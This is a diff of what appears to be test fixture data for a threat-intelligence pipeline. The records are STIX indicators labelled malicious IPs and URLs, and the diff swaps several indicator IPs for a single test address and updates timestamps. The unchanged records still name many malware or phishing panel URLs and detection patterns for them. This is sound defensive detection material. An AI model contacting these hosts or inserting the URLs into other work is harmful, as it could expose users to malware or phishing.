@@ -29399,7 +29399,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 162.144.13.146", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55342497313; iType: mal_ip; State: active; Org: Unified Layer; Source: CyberCrime", "modified": "2020-02-23T02:54:19.374Z", "valid_from": "2020-02-23T02:54:19.374Z", @@ -29421,12 +29421,12 @@ "first_seen": "2020-02-23T02:54:19.374Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "162.144.13.146" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.390353755Z", - "original": "{\"created\":\"2020-02-23T02:54:19.374Z\",\"description\":\"TS ID: 55342497313; iType: mal_ip; State: active; Org: Unified Layer; Source: CyberCrime\",\"id\":\"indicator--12abfac3-5251-45f4-bfde-20e3081d0f29\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-54\"],\"modified\":\"2020-02-23T02:54:19.374Z\",\"name\":\"mal_ip: 162.144.13.146\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '162.144.13.146']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:54:19.374Z\"}", + "ingested": "2021-12-13T08:38:40.026433500Z", + "original": "{\"created\":\"2020-02-23T02:54:19.374Z\",\"description\":\"TS ID: 55342497313; iType: mal_ip; State: active; Org: Unified Layer; Source: CyberCrime\",\"id\":\"indicator--12abfac3-5251-45f4-bfde-20e3081d0f29\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-54\"],\"modified\":\"2020-02-23T02:54:19.374Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:54:19.374Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -29477,7 +29477,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390357291Z", + "ingested": "2021-12-13T08:38:40.026440200Z", "original": "{\"created\":\"2020-02-23T02:54:25.477Z\",\"description\":\"TS ID: 55342497258; iType: mal_url; State: active; Org: InMotion Hosting; Source: CyberCrime\",\"id\":\"indicator--8b4fe873-9b07-4985-9818-291623fc07b9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-02-23T02:54:25.477Z\",\"name\":\"mal_url: http://mawa2ef.com/core/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://mawa2ef.com/core/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:54:25.477Z\"}", "category": "threat", "type": "indicator", @@ -29529,7 +29529,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390361188Z", + "ingested": "2021-12-13T08:38:40.026446800Z", "original": "{\"created\":\"2020-02-23T02:54:39.696Z\",\"description\":\"TS ID: 55342497298; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--c3486bc6-ca92-469f-b0d0-fd8f5cd81580\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-23T02:54:39.696Z\",\"name\":\"mal_url: http://febvnxp.xyz/P2/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://febvnxp.xyz/P2/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:54:39.696Z\"}", "category": "threat", "type": "indicator", 
@@ -29581,7 +29581,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390364675Z", + "ingested": "2021-12-13T08:38:40.026453500Z", "original": "{\"created\":\"2020-02-23T02:54:39.976Z\",\"description\":\"TS ID: 55342497308; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--0748270e-f010-4598-a389-553d3fffcb48\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-23T02:54:39.976Z\",\"name\":\"mal_url: http://febspxi.xyz/P1/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://febspxi.xyz/P1/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:54:39.976Z\"}", "category": "threat", "type": "indicator", @@ -29600,7 +29600,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 202.67.10.173", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55342497254; iType: mal_ip; State: active; Org: PT. Dhecyber Flow Indonesia; Source: CyberCrime", "modified": "2020-02-23T02:54:40.035Z", "valid_from": "2020-02-23T02:54:40.035Z", 
@@ -29622,12 +29622,12 @@ "first_seen": "2020-02-23T02:54:40.035Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "202.67.10.173" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.390368091Z", - "original": "{\"created\":\"2020-02-23T02:54:40.035Z\",\"description\":\"TS ID: 55342497254; iType: mal_ip; State: active; Org: PT. Dhecyber Flow Indonesia; Source: CyberCrime\",\"id\":\"indicator--cd075ee5-9b9f-4203-a9a3-c9592a6f6941\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-47\"],\"modified\":\"2020-02-23T02:54:40.035Z\",\"name\":\"mal_ip: 202.67.10.173\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '202.67.10.173']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:54:40.035Z\"}", + "ingested": "2021-12-13T08:38:40.026460200Z", + "original": "{\"created\":\"2020-02-23T02:54:40.035Z\",\"description\":\"TS ID: 55342497254; iType: mal_ip; State: active; Org: PT. Dhecyber Flow Indonesia; Source: CyberCrime\",\"id\":\"indicator--cd075ee5-9b9f-4203-a9a3-c9592a6f6941\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-47\"],\"modified\":\"2020-02-23T02:54:40.035Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:54:40.035Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -29678,7 +29678,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390371658Z", + "ingested": "2021-12-13T08:38:40.026466800Z", "original": "{\"created\":\"2020-02-23T02:54:40.281Z\",\"description\":\"TS ID: 55342497241; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--ed6fe1be-e6b6-436e-9d8f-f2440d34b32f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-02-23T02:54:40.281Z\",\"name\":\"mal_url: http://dabain.live/Lokivo/Panel/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://dabain.live/Lokivo/Panel/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:54:40.281Z\"}", "category": "threat", "type": "indicator", @@ -29697,7 +29697,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 50.116.87.108", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55342497251; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime", "modified": "2020-02-23T02:54:48.232Z", "valid_from": "2020-02-23T02:54:48.232Z", 
@@ -29719,12 +29719,12 @@ "first_seen": "2020-02-23T02:54:48.232Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "50.116.87.108" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.390374904Z", - "original": "{\"created\":\"2020-02-23T02:54:48.232Z\",\"description\":\"TS ID: 55342497251; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--3e220a1d-3d12-4baf-984e-90a3b7431aff\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-59\"],\"modified\":\"2020-02-23T02:54:48.232Z\",\"name\":\"mal_ip: 50.116.87.108\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '50.116.87.108']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:54:48.232Z\"}", + "ingested": "2021-12-13T08:38:40.026473600Z", + "original": "{\"created\":\"2020-02-23T02:54:48.232Z\",\"description\":\"TS ID: 55342497251; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--3e220a1d-3d12-4baf-984e-90a3b7431aff\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-59\"],\"modified\":\"2020-02-23T02:54:48.232Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:54:48.232Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -29742,7 +29742,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://193.142.59.96/africa/logs/omc.php", + "name": "mal_url: http://89.160.20.156/africa/logs/omc.php", "description": "TS ID: 55342497316; iType: mal_url; State: active; Source: CyberCrime", "modified": "2020-02-23T02:54:53.263Z", "valid_from": "2020-02-23T02:54:53.263Z", 
@@ -29767,16 +29767,16 @@ "url": { "path": "/africa/logs/omc.php", "extension": "php", - "original": "http://193.142.59.96/africa/logs/omc.php", + "original": "http://89.160.20.156/africa/logs/omc.php", "scheme": "http", - "domain": "193.142.59.96", - "full": "http://193.142.59.96/africa/logs/omc.php" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/africa/logs/omc.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.390378761Z", - "original": "{\"created\":\"2020-02-23T02:54:53.263Z\",\"description\":\"TS ID: 55342497316; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--6bc71acc-f3da-4b79-bcc0-7ce4a4a4d4ce\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-23T02:54:53.263Z\",\"name\":\"mal_url: http://193.142.59.96/africa/logs/omc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://193.142.59.96/africa/logs/omc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:54:53.263Z\"}", + "ingested": "2021-12-13T08:38:40.026476800Z", + "original": "{\"created\":\"2020-02-23T02:54:53.263Z\",\"description\":\"TS ID: 55342497316; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--6bc71acc-f3da-4b79-bcc0-7ce4a4a4d4ce\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-23T02:54:53.263Z\",\"name\":\"mal_url: http://89.160.20.156/africa/logs/omc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/africa/logs/omc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:54:53.263Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -29827,7 +29827,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390382148Z", + "ingested": "2021-12-13T08:38:40.026481600Z", "original": "{\"created\":\"2020-02-23T02:54:54.071Z\",\"description\":\"TS ID: 55342497266; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--1fcdf65f-a35b-4556-a7cc-6c61084af334\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-23T02:54:54.071Z\",\"name\":\"mal_url: http://fvrlink.xyz/P2/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://fvrlink.xyz/P2/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:54:54.071Z\"}", "category": "threat", "type": "indicator", @@ -29879,7 +29879,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390385714Z", + "ingested": "2021-12-13T08:38:40.026486700Z", "original": "{\"created\":\"2020-02-23T02:55:00.871Z\",\"description\":\"TS ID: 55342497310; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime\",\"id\":\"indicator--b1974beb-95fb-42b7-b2c0-81f71643da88\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-23T02:55:00.871Z\",\"name\":\"mal_url: http://euromopy.tech/rosemond/backup/dataz/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://euromopy.tech/rosemond/backup/dataz/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:55:00.871Z\"}", "category": "threat", "type": "indicator", 
@@ -29931,7 +29931,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390389141Z", + "ingested": "2021-12-13T08:38:40.026492500Z", "original": "{\"created\":\"2020-02-23T02:55:00.907Z\",\"description\":\"TS ID: 55342497300; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--48501c24-3a05-4f0c-88f1-2a50eaa227ea\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-23T02:55:00.907Z\",\"name\":\"mal_url: http://febspxi.xyz/P6/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://febspxi.xyz/P6/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:55:00.907Z\"}", "category": "threat", "type": "indicator", @@ -29983,7 +29983,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390392948Z", + "ingested": "2021-12-13T08:38:40.026496200Z", "original": "{\"created\":\"2020-02-23T02:55:00.94Z\",\"description\":\"TS ID: 55342497242; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--6cfdb5ac-7f06-48e6-9ba6-67ade05e01d6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-02-23T02:55:00.94Z\",\"name\":\"mal_url: http://ovdoker.myjino.ru/dashboard/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ovdoker.myjino.ru/dashboard/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:55:00.94Z\"}", "category": "threat", "type": "indicator", 
@@ -30035,7 +30035,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390396555Z", + "ingested": "2021-12-13T08:38:40.026501100Z", "original": "{\"created\":\"2020-02-23T02:55:03.894Z\",\"description\":\"TS ID: 55342497264; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--f48e2a6f-9af6-4b9c-b9a7-e2775d552731\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-23T02:55:03.894Z\",\"name\":\"mal_url: http://fvrlink.xyz/P4/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://fvrlink.xyz/P4/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:55:03.894Z\"}", "category": "threat", "type": "indicator", @@ -30087,7 +30087,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390399801Z", + "ingested": "2021-12-13T08:38:40.026507900Z", "original": "{\"created\":\"2020-02-23T02:55:15.714Z\",\"description\":\"TS ID: 55342497314; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--a3c0fc0a-ae59-495a-a9cc-b2dfe9a494ab\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-23T02:55:15.714Z\",\"name\":\"mal_url: http://epperfums.com/dino/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://epperfums.com/dino/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:55:15.714Z\"}", "category": "threat", "type": "indicator", 
@@ -30138,7 +30138,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390424678Z", + "ingested": "2021-12-13T08:38:40.026512100Z", "original": "{\"created\":\"2020-02-24T02:54:25.932Z\",\"description\":\"TS ID: 55344292231; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--abe3e442-e923-4ad1-b4cb-3695a954a2a0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-69\"],\"modified\":\"2020-02-24T02:54:25.932Z\",\"name\":\"mal_url: http://saind.myjino.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://saind.myjino.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-24T02:54:25.932Z\"}", "category": "threat", "type": "indicator", @@ -30190,7 +30190,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390432252Z", + "ingested": "2021-12-13T08:38:40.026516600Z", "original": "{\"created\":\"2020-02-25T02:52:18.371Z\",\"description\":\"TS ID: 55347597591; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime\",\"id\":\"indicator--c19c0ccc-9df8-4804-83da-1c469d220574\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-25T02:52:18.371Z\",\"name\":\"mal_url: http://farsson.com/~zadmin/7/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://farsson.com/~zadmin/7/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:18.371Z\"}", "category": "threat", "type": "indicator", 
@@ -30242,7 +30242,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390437351Z", + "ingested": "2021-12-13T08:38:40.026519900Z", "original": "{\"created\":\"2020-02-25T02:52:27.703Z\",\"description\":\"TS ID: 55347597548; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime\",\"id\":\"indicator--00bee6fc-4a90-4160-8493-8176f8cf73ff\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-25T02:52:27.703Z\",\"name\":\"mal_url: http://farsson.com/~zadmin/14/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://farsson.com/~zadmin/14/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:27.703Z\"}", "category": "threat", "type": "indicator", @@ -30294,7 +30294,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390441950Z", + "ingested": "2021-12-13T08:38:40.026524600Z", "original": "{\"created\":\"2020-02-25T02:52:27.729Z\",\"description\":\"TS ID: 55347597515; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--952cf095-32f4-4b10-8680-499ccd9f784f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-25T02:52:27.729Z\",\"name\":\"mal_url: http://pabloemino.pw/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://pabloemino.pw/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:27.729Z\"}", "category": "threat", "type": "indicator", 
@@ -30313,7 +30313,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://37.72.168.165/login", + "name": "mal_url: http://89.160.20.156/login", "description": "TS ID: 55347597501; iType: mal_url; State: active; Org: Swiftway Sp. z o.o.; Source: CyberCrime", "modified": "2020-02-25T02:52:27.765Z", "valid_from": "2020-02-25T02:52:27.765Z", 
@@ -30337,16 +30337,16 @@ "provider": "CyberCrime", "url": { "path": "/login", - "original": "http://37.72.168.165/login", + "original": "http://89.160.20.156/login", "scheme": "http", - "domain": "37.72.168.165", - "full": "http://37.72.168.165/login" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/login" } } }, "event": { - "ingested": "2021-12-13T05:57:34.390445978Z", - "original": "{\"created\":\"2020-02-25T02:52:27.765Z\",\"description\":\"TS ID: 55347597501; iType: mal_url; State: active; Org: Swiftway Sp. z o.o.; Source: CyberCrime\",\"id\":\"indicator--7f18dccc-1649-44ea-b9c7-e445487506a2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-43\"],\"modified\":\"2020-02-25T02:52:27.765Z\",\"name\":\"mal_url: http://37.72.168.165/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://37.72.168.165/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:27.765Z\"}", + "ingested": "2021-12-13T08:38:40.026530Z", + "original": "{\"created\":\"2020-02-25T02:52:27.765Z\",\"description\":\"TS ID: 55347597501; iType: mal_url; State: active; Org: Swiftway Sp. z o.o.; Source: CyberCrime\",\"id\":\"indicator--7f18dccc-1649-44ea-b9c7-e445487506a2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-43\"],\"modified\":\"2020-02-25T02:52:27.765Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:27.765Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -30364,7 +30364,7 @@
 "object_marking_refs": [
 "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"
 ],
- "name": "mal_ip: 185.154.52.251",
+ "name": "mal_ip: 89.160.20.156",
 "description": "TS ID: 55347597469; iType: mal_ip; State: active; Org: EuroByte LLC; Source: CyberCrime",
 "modified": "2020-02-25T02:52:27.808Z",
 "valid_from": "2020-02-25T02:52:27.808Z",
@@ -30386,12 +30386,12 @@
 "first_seen": "2020-02-25T02:52:27.808Z",
 "type": "ipv4-addr",
 "provider": "CyberCrime",
- "ip": "185.154.52.251"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.390467728Z",
- "original": "{\"created\":\"2020-02-25T02:52:27.808Z\",\"description\":\"TS ID: 55347597469; iType: mal_ip; State: active; Org: EuroByte LLC; Source: CyberCrime\",\"id\":\"indicator--4759e40a-5abd-49dc-90fd-2ba8bac1a613\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-25T02:52:27.808Z\",\"name\":\"mal_ip: 185.154.52.251\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '185.154.52.251']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:27.808Z\"}",
+ "ingested": "2021-12-13T08:38:40.026535800Z",
+ "original": "{\"created\":\"2020-02-25T02:52:27.808Z\",\"description\":\"TS ID: 55347597469; iType: mal_ip; State: active; Org: EuroByte LLC; Source: CyberCrime\",\"id\":\"indicator--4759e40a-5abd-49dc-90fd-2ba8bac1a613\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-25T02:52:27.808Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:27.808Z\"}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -30409,7 +30409,7 @@
 "object_marking_refs": [
 "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"
 ],
- "name": "mal_ip: 194.87.146.180",
+ "name": "mal_ip: 89.160.20.156",
 "description": "TS ID: 55347597509; iType: mal_ip; State: active; Org: RUCloud; Source: CyberCrime",
 "modified": "2020-02-25T02:52:37.329Z",
 "valid_from": "2020-02-25T02:52:37.329Z",
@@ -30431,12 +30431,12 @@
 "first_seen": "2020-02-25T02:52:37.329Z",
 "type": "ipv4-addr",
 "provider": "CyberCrime",
- "ip": "194.87.146.180"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.390481344Z",
- "original": "{\"created\":\"2020-02-25T02:52:37.329Z\",\"description\":\"TS ID: 55347597509; iType: mal_ip; State: active; Org: RUCloud; Source: CyberCrime\",\"id\":\"indicator--ae58138e-b594-4519-adb0-6dbbd8377b75\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-47\"],\"modified\":\"2020-02-25T02:52:37.329Z\",\"name\":\"mal_ip: 194.87.146.180\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '194.87.146.180']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:37.329Z\"}",
+ "ingested": "2021-12-13T08:38:40.026543200Z",
+ "original": "{\"created\":\"2020-02-25T02:52:37.329Z\",\"description\":\"TS ID: 55347597509; iType: mal_ip; State: active; Org: RUCloud; Source: CyberCrime\",\"id\":\"indicator--ae58138e-b594-4519-adb0-6dbbd8377b75\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-47\"],\"modified\":\"2020-02-25T02:52:37.329Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:37.329Z\"}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -30454,7 +30454,7 @@
 "object_marking_refs": [
 "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"
 ],
- "name": "mal_ip: 81.177.135.161",
+ "name": "mal_ip: 89.160.20.156",
 "description": "TS ID: 55347597663; iType: mal_ip; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime",
 "modified": "2020-02-25T02:52:38.025Z",
 "valid_from": "2020-02-25T02:52:38.025Z",
@@ -30476,12 +30476,12 @@
 "first_seen": "2020-02-25T02:52:38.025Z",
 "type": "ipv4-addr",
 "provider": "CyberCrime",
- "ip": "81.177.135.161"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.390490541Z",
